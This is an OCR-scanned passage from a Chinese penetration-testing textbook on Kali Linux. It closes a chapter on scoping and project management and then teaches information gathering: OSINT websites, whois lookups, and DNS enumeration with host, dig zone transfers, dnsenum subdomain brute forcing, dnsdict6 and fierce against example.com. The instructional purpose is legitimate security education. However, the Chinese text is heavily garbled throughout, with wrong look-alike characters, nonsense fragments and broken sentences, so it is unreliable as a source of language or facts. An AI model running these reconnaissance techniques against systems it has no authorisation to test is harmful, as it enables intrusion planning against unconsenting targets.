e 帮助 客户 消除 所 有 尚 未 被 对 手 恶 意 利用 的 潜在 风险 ， 避 免 潜在 事 
故 可 能 造成 的 损失 ， 从 而 提高 了 投资 回报 率 (ROI) 。 

e 评 佑 人员 向 客户 技术 团队 推荐 的 详细 的 安全 流程 ， 可 帮助 客户 消 
除 有 关 的 安全 隐患 ， 最 终 减 少 客户 的 运营 负担 。 

e 根据 目标 信息 系统 所 采用 的 故 层 技术 ， 以 业内 相应 的 最 佳 安全 实 
践 为 蓝本 ， 配 合 最 佳 组 合 的 工具 和 技术 ， 对 被 测 单位 的 信息 系统 进行 
安全 评估 e 

e 推荐 所 有 可 用 于 保护 经 各 性 资产 的 安全 解决 方案 。 


要 管理 好 渗透 测试 项 目 ， 束 要 彻底 了 解 范围 界定 流程 中 的 各 个 音 
分 。 一 旦 明确 了 范围 目标 ， 项 目 主 管束 可 以 与 渗透 测试 人 员 协 作 ， 共 
同 开 发 一 个 拟定 好 项 目 计划 和 时 间 进 度 的 正式 大 纲 。 虽 然 渗透 测试 人 
员 通 党 可 以 独立 完成 这 个 任务 ， 但 是 让 客户 参与 进来 更 好 ， 因 为 他 们 
会 在 有 关 的 日 程 安排 上 给 予 积极 的 配合 。 项 目 管理 和 进度 安排 非常 重 
要 ， 因 为 在 执行 测试 任务 时 必须 精确 保持 进度 ， 避 免 超出 预定 的 时 
间 。 在 渗透 测试 过 程 中 ， 一 旦 给 相关 任务 明确 指派 了 合适 的 资源 之 
后 ， 就 更 有 必要 给 与 之 有 关 的 关键 任务 拟定 进度 安排 。 

所 谓 “任务 ”， 就 是 由 渗透 测试 人 完成 的 一 部 分 工作 。 而 “资源 ”可 以 
定安 全 评估 中 涉及 的 人 员 ， 也 可 以 是 在 测试 过 程 中 的 普通 资源 ， 例 如 
实验 器 材 。 我 们 可 以 使 用 许多 现 有 的 项 目 管理 工具 ， 把 项 目 管理 得 高 
效 而 划算 。 下 文 列 出 了 一 些 项 目 管理 工具 。 您 可 根据 实际 环境 和 客户 
需求 来 选择 最 佳 的 工具 。 


项 目 管理 工具 官方 网 站 
Microsoft Office Project Professional http://www.microsoft.com/project/ 
TimeControl http://www.timecontrol.com/ 
TaskMerlin http://www.taskmerlin.com/ 
Project Kick Start Pro http://www.projectkickstart.com/ 
FastTrack Schedule http://www.aecsoftware.com 
Serena OpenProj http://www.openproj.org/ 
TaskJuggler http://www. taskjuggler.org/ 


上 述 每 个 工具 的 功能 都 很 强大 。 应 用 这 些 工 具 ， 参 照 预定 任务 和 
时 间 规 划 ， 项 目 管 理 主 管 可 以 轻松 地 人 奶 踩 、 管 理沙 透 测试 人 员 的 工作 
进度 。 此 外 ， 这 些 工具 都 提供 了 非常 高 级 的 功能 。 例 如 ， 在 任务 完成 
和 超过 期 限时 ， 这 些 工 具 可 以 给 项 目 主 管 发 送 警报 信息 。 实 际 上 ， 在 
渗透 测试 工作 中 应 用 项 目 管理 工具 的 好 处 有 很 多 。 例 如 能 够 促进 入 们 
按时 完成 任务 ， 提 高 测试 生产 力 和 客户 满意 度 ， 改 善 工作 的 质 和 量 ， 
灵活 地 控制 工作 流程 等 。 


3.6 总 结 


本 章 介绍 了 渗透 测试 工作 里 与 范围 界定 有 关 的 部 分 。 如 果 您 准备 
局 动 专业 的 渗透 测试 项 目 ， 束 应 当 充 分 重视 这 部 分 工作 。 本 章 介绍 的 
内 容 主 要 是 确定 测试 需求 方面 的 必要 规范 。 基 于 这 个 目的 ， 本 章 强 调 
并 详细 搞 述 了 范围 界定 流程 的 每 一 个 相关 步骤 。 这 些 步 又 构成 了 实施 
测试 所 需 的 过 程控 制 路 线 图 。 范 围 界定 流程 由 5 个 独立 的 元 素 组 成 : 
收集 需求 、 筹 划 工 作 、 边 界 分 析 、 明 确 业 务 指标 、 项 目 管 理 和 统筹 调 
度 。 范 围 界 定 流 程 的 工作 ， 旨 在 于 获取 、 管 理 尽 可 能 多 的 与 目标 环境 
有 关 的 信息 ， 这 部 分 信息 在 整个 渗透 测试 的 过 程 里 都 将 起 到 举足轻重 
的 作用 。 下 面 ， 我 们 总 结 一 下 范围 界定 流程 工作 的 每 个 组 成 部 分 。 

e 收集 需求 : 从 客户 或 者 用 户 那里 收集 什么 信息 才能 成 功 完成 渗透 
测试 任务 ? 这 部 分 内 容 提供 一 个 可 行 的 通用 准则 。 在 这 个 阶段 的 工作 
应 当 明 确 渗透 测试 的 类 型 、 基 础 设施 信息 、 组 织 结构 关系 、 预 算 概 
要 、 时 间 分 配 和 交付 成 来 的 具体 类 型 。 

e 筹划 工作 : 这 个 阶段 的 工作 分 为 制定 严 齐 的 测试 流程 、 解 决 人 员 
配置 、 成 本 分 析 、 保 蜜 协议、 渗透 测试 合同 以 及 操作 规则 的 问题 。 这 
些 工 作 内 容 本 身 束 够 成 了 制定 正式 测试 计划 所 需 的 各 个 流程 。 最 终 制 
定 的 测试 计划 应 能 准确 反映 客户 需求 ， 应 能 全 面 解决 测试 工作 会 涉及 
的 法 律 层面 和 业务 领域 的 各 种 问题 ， 应 能 合理 分 配 资 源 ， 适 当 控 制 成 
本 ， 并 明确 操作 规则 。 另 外 ， 本 章 还 有 一 个 测试 计划 检查 清单 的 样 
本 ， 它 会 有 助 于 保证 测试 计划 的 完整 性 。 

e 边界 分 析 : 介绍 了 在 解读 客户 需求 时 ， 需 要 注意 何 种 的 局 限 条 件 
和 测试 边界 。 它 们 主要 分 为 技术 上 的 限制 、 知 识 限制 ， 或 者 客户 为 了 
控制 渗透 测试 流程 而 提出 的 基础 设施 有 关 的 其 他 方面 的 限制 。 专 业 人 
员 应 能 根据 客户 的 需求 ， 准 确 清 晰 地 判断 出 各 种 测试 边界 。 有 一 些 特 
定 的 流程 可 用 于 克服 这 些 问题 。 


e 明确 业务 指标 ， 这 个 阶段 的 工作 主要 关注 渗透 测试 服务 能 够 给 客 
尸 带 来 的 关键 效 益 。 本 对 的 这 一 小 市 提供 了 一 系列 的 业务 指标 ， 这 些 
指标 结合 了 评估 准则 和 评估 服务 的 专业 效果 。 

e 项 目 管理 和 统筹 调度 : 在 范围 界定 流程 里 ， 这 个 阶段 的 工作 至 关 
重要 。 当 收集 好 全 部 需求 ， 并 将 之 整理 为 测试 计划 的 有 关内 容 之 后 ， 
就 需要 为 每 项 任务 分 配 适 当 的 资源 和 时 间 。 我 们 可 以 通过 使 用 先进 的 
项 目 管理 工具 ， 上 毫 不 费力 地 跟踪 这 些 任 务 的 进度 状况 和 资源 状态 。 这 
些 工作 有 助 于 提高 测试 的 生产 力 和 工作 效率 。 

下 一 章 将 介绍 在 渗透 测试 中 扮演 重要 角色 的 侦察 流程 。 它 包括 探 
测 公共 资源 、DNS 服务 右 、 搜 索引 警 以 及 其 他 有 关 目 标 基 础 设施 的 逻 
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第 4 音 信息 收集 


本 章 将 曾 述 信息 收集 的 概念 及 其 作用 ， 进 而 介绍 信息 收集 阶段 的 
各 项 渗透 测试 工作 。 此 外 ， 我 们 还 会 介绍 Kali Linux IBS SE T 
具 。 布 望 读 者 在 阅读 本 章 之 后 能 够 理解 在 信息 收集 阶段 的 渗透 测试 工 
作 ， 并 且 能 够 在 实际 的 渗透 测试 中 顺利 收集 各 种 必要 信息 。 

前 面 章 世 介绍 过 ， 渗 透 测试 方法 论 的 第 二 个 阶段 是 信息 收集 阶 
段 。 在 这 个 阶段 中 ， 要 尽 可 能 地 收集 与 测试 目标 有 关 的 各 类 信息 。 这 
些 信息 包括 DNS 信 息 、IP 地 址 、 采 用 的 技术 以 及 具体 配置 、 用 户 名 的 
组 织 单 位 、 文 件 、 程 序 代码 、 密 码 重 置信 息 、 联 系 人 信息 等 。 信 息 收 
集 阶段 收集 到 的 每 一 条 信息 都 至 天 重要 。 

言 息 收集 的 方法 可 归 为 两 类 : 主动 式 信 息 收 集 和 被 动 式 信息 收 
集 。 主 动 式 收集 方 法 是 通过 直接 发 起 与 被 测 目标 网 络 之 间 的 互动 来 获 
取 相 关 信 息 。 例 如 ，ICMP ping 或 者 TCP vin A ia T Eos E 


收集 手段 。 而 被 动 信息 收集 方法 ， 则 是 通过 第 三 方 服务 来 获取 目标 网 
络 的 相关 信息 ， 例 如 使 用 谷歌 搜索 引擎 等 。 

这 两 种 收集 方式 并 没有 优 务 之 分 ， 每 种 方式 都 有 各 目的 优点 。 如 
条 采 用 被 动 式 扫描 ， 您 收集 到 的 信息 相对 较 少 ， 但 是 这 种 扫描 却 不 会 
被 发 现 。 然 而 ， 尽 管 主 动 扫描 可 获取 的 信息 相对 多 一 些 ， 但 是 很 多 设 
备 可 能 已 经 捕获 了 您 的 扫描 行为 。 在 渗透 测试 项 目 中 ， 可 能 需要 重复 
进行 多 次 扫描 才能 获取 足够 充分 的 信息 。 您 也 可 以 与 渗透 测试 的 顾客 
进行 沟通 ， 选 取 他 们 需要 的 信息 收集 方式 。 

本 章 内 容 分 为 下 述 几 个 部 分 : 

e 通过 公开 网 站 收集 目标 域 的 有 关 信 息 ; 

e 收集 域 的 注册 信息 .; 

e DNS 分 析 ; 

e 收集 路 由 信息 ; 

e 利用 搜索 引擎 。 


4.1 公开 网 站 


我 们 可 以 通过 某 些 公 开 网 站 来 收集 目标 域 的 有 天 信息 。 通 过 公开 
网 站 收集 信息 的 好 处 在 于 不 必 辣 目标 网 络 直接 发 送 数 据 ， 从 而 避免 使 
目标 察觉 我 们 的 行动 。 

您 可 以 使 用 下 述 网 站 ; 


网 址 


1 http://www.archive.org 
2 http://www.domaintools.com/ 
3 http://www.alexa.com/ 

4 http://serversniff.net/ 
5 http://centralops.net/ 
6 http://www.robtex.com 

1 http://www.pipl.com/ 

8 http://yoname.com 

9 http://wink.com/ 

10 http://www.isearch.com/ 
11 http://www.tineye.com 


http://www.sec.gov/edgar. 
shtml 
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用 公开 网 站 获取 信息 。 


收录 了 部 分 网 站 的 历史 页 面 
收录 了 各 种 域名 情报 
提供 网 站 信息 的 分 析 服 务 


免费 的 “瑞士 军刀 ” 可 监测 网 络 、 服 务 器 状态 和 路 由 信息 

多 种 免费 的 在 线 工 具 ， 提 供 DNS 工具 、 验 证 E-mail 地 址 ， 以 及 
在 线 ping、whois、traceroute 服务 

可 用 于 搜索 域名 和 网 络 信息 

通过 姓名 、 城 市 、 州 (省 ) 和 国家 等 信息 来 查找 人 物 
该 网 站 通过 SNS 和 博客 查找 人 物 

免费 的 人 物 搜索 引擎 ， 用 户 可 以 通过 姓名 、 电 话 号 码 、E-mail、 


网 站 、 照 片 等 信息 查找 人 物 


免费 的 人 物 搜索 引擎 ， 用 户 可 以 通过 姓名 、 电 话 
息 查找 人 物 
TinEye 是 图 像 的 反 向 搜索 引擎 。 我 们 可 以 使 用 TinEye 查找 图 片 
的 出 处 、 使 用 方式 、 是 否 存 在 其 他 版 本 ， 也 可 用 之 搜索 同一 图 片 
的 更 高 解析 度 的 版 本 


可 在 (美国 ) 证 券 交 易 委 员 会 的 网 站 上 搜索 上 市 公 


r1 
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您 只 需 在 可 接 入 互联 网 的 设备 上 打开 浏览 如 
我 们 建议 您 在 使 用 Kali Linux 里 的 工具 之 前 首先 使 


为 了 保护 真正 存在 的 网 域 ， 我 们 在 本 文 的 示例 里 更 换 了 真实 的 域 


名 。 下 文 用 到 了 很 多 的 域名 ， 例 如 IANA 的 保留 域名 examples.com。 


些 域名 仅 供 演示 之 用 。 
4.2 


在 知道 目标 的 域名 之 后 ， 


你 : 术 
DN/ 


这 


注册 信息 


员 做 的 第 一 件 事 可 能 融 是 从 whois 数 据 


库 里 获取 域名 的 注册 信息 。whois 数 据 库 记录 有 该 域名 的 DNS 服务 大 信 


轧 和 注册 人 的 联系 信息 。 


WHOIS 是 一 个 标准 的 互联 网 协议 ， 可 用 于 收集 网 络 注册 、 


注册 域 


` IP 地 址 和 自治 系统 的 信息 。RFC 3912 明确 了 这 一 规则 的 有 关 规 
有 兴趣 的 读者 可 参见 https://www. ietf.org/rfc/rfc3912.txt ° 


默认 安装 的 Kali Linux A whois & Fy 如 需 查询 某 一 域名 


的 whois 信息 ， 可 在 终端 中 使 用 下 述 whois 指 令 


<<< 


# whois example.com 
然后 ， 该 指令 会 显示 这 个 域名 的 whois 信 息 : 
Whois Server Version 2.0 
Domain names in the .com and .net domains can now be registered 
with many different competing registrars. Go to http://www.internic.net 
for detailed information. 
Domain Name: EXAMPLE.COM 
Registrar: REGISTRAR.COM 
Whois Server: whois.registrar.com 
Referral URL: http://registrar.com 
Name Server: NS.HOSTING.COM 
Name Server: NS2.HOSTING.COM 
Status: clientDeleteProhibited 
Status: clientRenewProhibited 
Status: clientTransferProhibited 
Status: clientUpdateProhibited 
Updated Date: 08-apr-2012 
Creation Date: 08-apr-2012 
Expiration Date: 08-apr-2015 
>>> Last update of whois database: Wed, 25 Jul 2012 02:15:41 UTC 


Please note: the registrant of the domain name is specified 
in the "registrant" field. In most cases, registrar.com 
is not the registrant of domain names listed in this database. 


The Registrant: 


Jalan Sudirman No. 1 
DKI Jakarta 
Indonesia 12345 
Domain Name: EXAMPLE.COM 
Created on: 08-Apr-12 
Expires on: 08-Apr-15 
Last Updated on: 08-Apr-12 
Administrative Contact: 
The Registrant 
Jalan Sudirman No. 1 
DKI Jakarta 
Indonesia 12345 
62 2112345678 
Technical Contact: 
The Registrant registrant@example.com 
Jalan Sudirman No. 1 
DKI Jakarta 
Indonesia 12345 
62 2112345678 
Domain servers in listed order: 
NS.HOSTING.COM 
NS2.HOSTING.COM 
我 们 可 以 在 上 述 whois 返回 结果 中 获取 DNS ARS as He A EAS k 
名 注册 人 的 联系 信息 。 这 些 信息 会 在 渗透 测试 的 后 续 阶 段 发 挥 作用 。 
除了 通过 命令 行 的 whois 客 户 端 程序 ， 我 们 还 可 以 使 用 下 述 网 站 获 
取 whois 信 息 ， 这 些 网 站 同样 通过 whois 客 户 端 程序 查询 有 关 信 息 。 


e www.whois.net 


e www.internic.net/whois.html 
此 外 ， 您 也 可 以 访问 顶级 域名 注册 商 ， 查 询 相应 域名 的 信息 。 


e 美洲 : www.arin.net/whois/ 


e 欧洲 : www.db.ripe.net/whois 

e ll X: www.apnic.net/apnic-info/whois search2 

顶级 域名 注册 商 的 系统 ， 只 提供 在 他 们 那里 注册 的 域名 的 whois 信 
fo HR ARIN 提供 的 whois 服务 只 能 在 它 目 己 的 数据 库 里 查找 whois 
信息 ， 而 不 会 搜索 RIPE 和 APNIC 的 数据 库 。 


4.3 DNS 记 录 分 析 
使 用 DNS 分 析 工 具 可 收集 DNS 服务 器 信息 和 有 关 域 名 的 相应 记 


DNS 记录 分 为 下 述 几 种 类 型 。 


编号 类 型 描述 
1 SOA 授权 管理 该 域 的 服务 器 
2 NS 名 称 解析 服务 器 
3 A IPv4 地 址 
4 MX 邮件 服务 器 地 址 
5 PTR 逆向 解析 记录 
6 AAAA IPv6 地 址 
7 CNAME 别名 记录 /Canonical name 

例如 ， 在 某 次 渗透 测试 的 过 程 之 中 ， 客 户 要 您 得 找 他 们 域名 下 的 


所 有 主机 和 IP 地 址 。 此 时 您 只 有 域名 信息 。 我 们 能 够 通过 儿 个 工具 回 
答 客户 的 询问 。 


4.3.1 host 


在 得 到 DNS 服 务 右 信息 之 后 ， 下 一 步 工作 就 是 找 出 主机 名 称 的 IP 
地 址 。 这 种 情况 下 ， 我 们 可 以 使 用 host 指 令 向 DNS 服务 器 查询 主机 的 卫 
地 址 。 


# host www.example.com 

该 指令 的 返回 结果 如 下 。 

www.example.com has address 192.0.43.10 

www.example.com has IPv6 address 2001:500:88:200::10 

我 们 可 以 从 中 找到 主机 www.example.com 的 IPv4 地 址 和 IPv6 地 址 。 
默认 情况 下 ，host 指 令 会 搜索 域名 的 A 记 录 、AAAA 记 录 和 MX 记 
如 需 查 询 全 部 DNS 记录 ， 可 以 使 用 选项 -a。 


# host -a example.com 


^ 


Trying "example.com" 

3; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 25153 

; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, 
ADDITIONAL: 2 

;; QUESTION SECTION: 


;example.com. IN ANY 

;; ANSWER SECTION: 

example.com. 3201 IN SOA dns1.icann.org. 
hostmaster.icann.org. 2012080782 7200 3600 1209600 3600 
example.com. 46840 IN NS a.iana-servers.net. 
example.com. 46840 IN NS b.iana-servers.net. 


;; ADDITIONAL SECTION: 

b.iana-servers.net. 1401 IN A 199.43.133.53 

a.iana-servers.net. 1401 IN A 199.43.133.53 

Received 170 bytes from 202.152.165.39#53 in 563 ms 

host 指 令 得 询 域名 信息 的 DNS 服务 右 ， 束 是 文件 /etcresolv.conf 指 定 
的 DNS 服务 器 。 如 果 想 得 询 其 他 的 DNS 服务 右 ， 可 在 指令 的 尾部 直接 
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通过 查询 域名 的 卫 信 息 ， 这 种 查询 叫做 正 向 查询 (forward 
lookup) ° 而 通过 IP 地 址 查询 域名 ， 这 种 查询 叫做 逆向 查询 (reverse 
lookup) ? 

使 用 下 述 指 令 进 行 赣 回 查 询 ， 将 会 得 到 什么 信息 ? 

host 23.23.144.81 

host 程序 还 可 以 进行 DNS 域 传输 (zone transfer) 。 域 传输 的 结 
包含 某 一 域 里 所 有 的 主机 名 称 。 

DNS 服 务 器 的 域 传输 机 制 用 于 在 主 控 (master) DNS 服 务 器 和 其 他 
服务 器 (通常 是 从 属 DNS 服 务 器 /slave) 进行 DNS 数 据 库 同 步 。 若 没有 
这 种 机 制 ， 管 理 员 就 得 分 别 更 新 每 台 DNS 服 务 器 的 数据 库 。DNS 服务 
怖 应 当 只 和 同一 域 里 的 经 过 吴 份 验证 的 服务 名 进行 域 传 输 。 

因为 DNS 域 传 输 功 能 可 能 外 泄 整个 域 的 所 有 信息 ， 所 以 人 们 大 多 
都 对 这 个 功能 进行 了 限制 。 当 今 ， 提 供 公 开 的 域 传输 的 DNS 服务 器 已 
经 很 少见 了 。 

WRES DNS 服务 器 会 与 任意 主机 进行 域 传输 ， 束 说 明 这 台 DNS 
服务 器 的 配置 不 正确 。 

如 果 肝 台 DNS 服 务 右 可 以 进行 域 传 输 ， 我 们 残 可 使 用 下 面 这 类 指 
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# host -] example.com ns4.isp.com 
DNS 域 传输 的 结果 如 下 。 

Using domain server: 

Name: ns4.isp.com 

Address: 172.16.176.22#53 

Aliases: 

example.com name server ns1.isp.com. 
example.com name server ns2.isp.com. 


example.com has address 192.168.1.1 


smtp.example.com has address 192.168.1.2 
mail.example.com has address 192.168.1.3 
webmail.example.com has address 192.168.1.3 
www.example.com has address 192.168.1.4 
在 进行 域 传输 时 ，host 指 令 将 会 返回 该 域 的 NS 记录 、PTR 记 录 和 地 
址 记录 。 本 例 所 使 用 的 配置 不 当 的 DNS 服务 货 是 ns4.isp.com。 
43.2 dig 


除了 host 指 令 之 外 ， 您 还 可 以 使 用 dig 指 令 进 行 DNS 查询 。 相 比 host 
指令 而 言 ，dig 指 令 的 用 法 更 为 灵活 ， 输 出 更 为 清晰 。 您 甚至 可 以 使 用 
dig 指 令 处 理 一 个 文件 里 所有 的 DNS 查询 指令 。 

我 们 可 使 用 dig 命 令 查询 example.com ( 见 图 4.1) ° 


root@kali:~# dig example.com 


; <<>> DiG 9.8.4-rpz2«rl1005.12-P1 <<>> example.com 

;; global options: «cmd 

;; Got answer: 

;; -»»HEADER««- opcode: QUERY, status: NOERROR, id: 3786 

;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: ©, ADDITIONAL: O 


;; QUESTION SECTION: 


;example.com. IN A 
;; ANSWER SECTION: 
example.com. 41023 IN A 192.0.43.10 


;; Query time: 14 msec 

;; SERVER: 10.17.3.245#53(10.17.3.245) 
;; WHEN: Mon May 20 08:53:09 2013 

;; MSG SIZE rcvd: 45 


图 4.1 
如 有 宋 在 使 用 它 的 时 候 不 指定 任何 选项 ，dig 指 令 仅 会 返回 该 域 的 A 
记录 。 如 需 碍 询 全 部 类 型 的 DNS 数据 ， 我 们 可 把 type 选 项 设 定 为 any 。 
# dig example.com any 
; <<>> DiG 9.7.0-P1 <<>> example.com any 


;; global options: cmd 

;; Got answer: 

5 ->> HEADER<<- opcode: QUERY, status: NOERROR, id: 40971 

; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, 
ADDITIONAL: 2 

;; QUESTION SECTION: 


;example.com. IN ANY 

; ANSWER SECTION: 

example.com. 3565 IN SOA dns1.icann.org. 
hostmaster.icann.org. 2012080782 7200 3600 1209600 3600 
example.com. 83186 IN AAAA  2001:500:88:200::10 
example.com. 48296 IN NS b.iana-servers.net. 
example.com. 48296 IN NS a.iana-servers.net. 


; ADDITIONAL SECTION: 

a.iana-servers.net. 182 IN A 199.43.132.53 

b.iana-servers.net. 182 IN A 199.43.133.53 

;; Query time: 327 msec 

3; SERVER: 202.152.165.39#53(202.152.165.39) 

;; WHEN: Sat Aug 18 10:46:09 2012 

3; MSG SIZE rcvd: 198 

这 条 指令 返回 了 该 域名 的 SOA 记 录 、NS 记 录 、A 记 录 和 AAAA 记 
录 。 

在 使 用 dig 指 令 进 行 域 传输 时 ， 我 们 必须 设置 DNS 服 务 絮 为 权威 
DNS， 并 且 设 置 传输 类 型 为 axfr。 

# dig @ns4.isp.com example.com axfr 

该 指令 的 返回 结果 如 下 。 


; <<>> DiG 9.7.0-P1 <<>> @ns4.isp.com example.com axfr 


; (1 server found) 


;; global options: +cmd 


example.com. 3600 IN SOA nsl.isp.com. hostmaster. 
isp.com. 2011020409 900 600 86400 3600 

example.com. 3600 IN NS ns1.isp.com 
example.com. 3600 IN NS ns4.isp.com 
example.com. 3600 IN A 192.168.1.1 
example.com. 3600 IN MX 192.168.1.3 


mail.example.com. 3600 IN A 192.168.1.3 

webmail.example.com. 3600 IN A 192.168.1.3 

www.example.com. 3600 IN A 192.168.1.4 

example.com. 3600 IN SOA ns1.isp.com hostmaster. 

isp.com 2011020409 900 600 86400 3600 

;; Query time: 855 msec 

3; SERVER: 172.16.176.22#53 (172.16.176.22) 

; WHEN: Sat Aug 18 10:59:11 2012 

5 XFR size: 9 records 

这 个 指令 的 返回 结果 和 host 的 返回 结果 十 分 相似 。 如 果 看 到 这 种 
类 型 的 返回 结果 ， 束 说 明 我 们 收集 到 了 所 有 DNS 记 和 孙 。 


4.3.3 dnsenum 


另外 ， 我 们 可 利用 dnsenum 程 序 收集 DNS 数据 。 这 个 程序 能 够 收集 
的 DNS 信息 分 为 下 述 几 类 ; 

e 主机 IP 地 址 ; 

e 该 域 的 DNS 服务 器 ; 

e 该 域 的 MX 记录 。 


在 这 一 章 里 ， 您 会 发 现 不 同 程序 的 返回 结果 十 分 相似 。 这 是 因为 
我 们 就 是 在 通过 不 同 的 程序 验证 相同 的 数据 。 返 回 同一 信息 的 程序 越 
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除了 获取 DNS 信息 的 功能 之 外 ，dnsenum 还 有 下 述 几 个 特性 。 

e 它 能 够 通过 谷歌 搜索 其 他 的 域名 和 子 域名 。 

e 可 使 用 字典 文件 对 子 域名 进行 其 力 破解 。Kali Linux 收录 的 
dnsenum 自 带 有 字典 文件 (dns.txt) ， 该 字典 可 测试 1480 个 子 域名 。 此 
外 另 有 可 测试 266930 个 子 域名 的 字典 文件 dns-big.txt 。 

e 可 对 C 类 网 段 进 行 whois 查询 并 计算 其 网 络 范围 。 

e 可 对 网 段 进 行 反 向 查询 。 

o 采用 多 线程 技术 ， 可 进行 并 发 查询 。 

如 需 局 动 dnsemu， 可 在 终端 中 使 用 下 述 指令 。 

# dnsenum 

而 后 ， 程 序 会 在 屏幕 上 显示 它 的 指令 介绍 。 

为 了 演示 dnsenum 的 用 法 ， 我 们 将 用 它 来 收集 目标 域 的 DNS 信息 。 

# dnsenum example.com 

该 指令 的 返回 结果 如 下 。 

dnsenum.pl example.com 

dnsenum.pl VERSION:1.2.2 


----- example.com ---- 


Host's addresses: 
Name Servers: 
ns1.isp.com 10771 IN A 172.168.1.2 


ns0.isp.com 7141 IN A 172.168.1.1 
Mail (MX) Servers: 


hermes1.example.com 864000 IN A 192.168.10.3 
hermes.example.com 3600 IN A  192.168.10.2 


Trying Zone Transfers and getting Bind Versions: 


Trying Zone Transfer for example.com on ns0.isp.com ... 
AXFR record query failed: NOERROR 


ns0.isp.com Bind Version: 


DNS server 

Trying Zone Transfer for example.com on ns1.isp.com ... 
example.com 86400 IN SOA 
example.com 86400 IN NS 
example.com 86400 IN MX 
example.com 86400 IN TXT 
admin.example.com 3600 IN NS 
blogs.example.com 3600 IN NS 
ftp.example.com 3600 IN A 192.168.10.4 
hermes.example.com 3600 IN A 192.168.10.2 
hermes.example.com 86400 IN TXT 
hermes.example.com 86400 IN SPF 
hermes1.example.com 86400 IN A 192.168.10.2 
www.example.com 3600 IN NS 


ns1.isp.com Bind Version: 

DNS server 

brute force file not specified, bay. 

默认 情况 下 ，dnsenum 会 返回 主机 地 址 、 名 称 解析 服务 器 和 邮件 服 
务 器 的 他 地 址 信息 。 好 在 nsl.isp.com 这 台 DNS 服 务 器 允许 我 们 对 


example.com 进 行 域 传输 。 

在 不 能 进行 域 传输 的 情况 下 ， 我 们 可 以 使 用 字典 文件 对 子 域名 进 
行 又 力 人 破解 。 例 如 ， 如 果 使 用 字典 文件 dns.txt 和 又 力 人 破解 example.com 的 
子 域名 ， 可 使 用 下 述 指令 。 

dnsenum -f dns.txt example.com 

该 指令 的 返回 结果 如 下 。 


Brute forcing with dns.txt: 


apps.example.com 86400 IN A 192.168.10.152 

mail.example.com 86400 IN A 192.168.10.107 

portal.example.com 86400 IN A 192.168.10.249 

请 注意 ，DNS 域 名 骏 力 破解 的 耗 时 较 长 。 

驻 运 的 是 ， 目 标 域 使 用 了 常见 域名 。 我 们 使 用 字典 文件 进行 又 力 
破解 ， 发 现 了 多 个 子 域 名 (apps、mail 和 portal) 。 

我 们 还 可 以 通过 Google 搜索 某 域 的 子 域名 。 在 DNS 域 传输 被 至 
用 的 情况 下 ， 这 种 方法 十 分 有 效 。 在 dnsenum 指 令 里 加 上 “-p 页 数 ” 选 
项 ， 可 在 Google 结 果 的 前 儿 页 里 搜索 子 域名 。 而 在 指令 的 里 加 上 “-s 数 
量 *”， 则 可 按 个 数 搜索 子 域名 。 为 了 加 速 搜 索 进程 ， 可 以 设置 线程 的 数 


量 (--threads) 。 


4.3.4 dnsdict6 


前 文 介绍 了 几 个 枚 举 IPv4 子 域名 的 DNS 工 具 。 如 果 您 需要 枚 举 IPv6 
的 子 域名 ， 就 需要 使 用 The Hacker’s Choice (THC) 小 组 推出 的 
dnsdict6 ° 

为 了 访问 Kali Linux 中 的 dnsdict6， 可 以 在 终端 中 输入 下 述 命令 。 

# dnsdict6 

这 将 显示 dsndict6 帮 助 页 面 。 


如 果 没 有 任何 选项 ，dsndict6 将 使 用 内 置 的 字典 文件 和 8 个 线程 。 
枚 举 example.com 各 子 域名 的 指令 如 下 。 

# dnsdict6 example.com 

该 指令 的 返回 结果 如 图 4.2 所 示 。 


root@kali:~# dnsdict6 example.com 

Starting DNS enumeration work on example.com. ... 

Starting enumerating example.com. - creating 8 threads for 798 words... 
Estimated time to completion: 1 to 2 minutes 

www.example.com. => 2001:500:88:200::10 


Found 1 domain name and 1 unique ipv6 address for example.com. 


图 4.2 

dnsdict6 上 自 带 的 字典 文件 可 测试 798 个 子 域名 。 在 使 用 dnsdict6 桑 力 
破解 子 域名 之 后 ， 我 们 可 以 看 到 它 测试 出 了 example.com 有 的 1 个 IPV6 的 子 
域名 (www) 。 

我 们 发 现 dnsdict6 显 示 的 字典 单词 的 数量 不 对 。 在 我 们 给 它 指定 了 
一 个 含有 3 个 条 目的 字典 文件 之 后 ，dnsdict6 程序 却 显示 字典 里 含有 4 个 
RH” 

在 指定 选项 -4 之 后 ，dnsdict6 就 可 以 测试 IP v4 的 子 域 名 。 还 可 通 
过 -d 选项 ， 让 它 收集 该 域 的 DNS 和 NS 人 信息。 现在， 我 们 演示 一 下 这 两 
个 选项 的 作用 〈 见 图 4.3) ° 


root@kali:~# dnsdict6 -d -4 example.com 

Starting DNS enumeration work on example.com. ... 

Gathering NS and MX information... 

NS of example.com. is b.iana-servers.net. -» 199.43.133.53 
NS of example.com. is b.iana-servers.net. -» 2001:500:8d::53 
NS of example.com. is a.iana-servers.net. -» 199.43.132.53 
NS of example.com. is a.iana-servers.net. -» 2001:500:8c::53 
Warning: no mail sever (MX) information found 


Starting enumerating example.com. - creating 8 threads for 798 words... 
Estimated time to completion: 1 to 2 minutes 

Warning: wildcard domain configured 

*.example.com. -> 124.81.172.106 

Warning: wildcard domain configured (2nd test) 

Www.example.com. => 192.0.43.10 

Www.example.com. => 2001:500:88:200::10 


Found 1 domain name, 2 unique ipv4 and 1 unique ipv6 addresses for example.com. 


图 4.3 
4.3.5 fierce 


DNS 枚 举 工 具 fierce 可 通过 多 项 技术 查找 目标 的 卫 地 址 和 主机 名 。 
它 会 通过 您 计算 机 使 用 的 DNS 服务 器 查找 继而 使 用 日 标 域 的 DNS Hk 
务 器 。 它 同样 可 以 利用 又 力 破解 子 域名 。 在 使 用 字典 文件 进行 又 力 破 
解 时 ， 它 会 调用 日 标 域 的 DNS 服务 右 逐 条 答 试 字典 里 的 DNS 条 目 。 这 
个 工具 的 主要 特点 是 ， 它 能 够 针对 不 连续 的 IP 空 间 和 主机 名 称 进行 测 
试 。 

在 Kali Linux 里 的 终端 窗口 里 使 用 下 壕 命 令 可 查看 fierce 的 帮助 文 
pe 

# fierce -h 

举例 来 说 ， 我 们 可 使 用 fierce 查 找 某 个 域 的 有 关 信 息 。 

# fierce -dns example.com -threads 3 

该 指令 返回 的 结 采 如 下 。 


DNS Servers for targetdomain.com: 


ns4.example.com 
ns1.example.com 
ns2.example.com 
ns3.example.com 
Trying zone transfer first... 
Testing ns4.example.com 
Request timed out or transfer not allowed. 
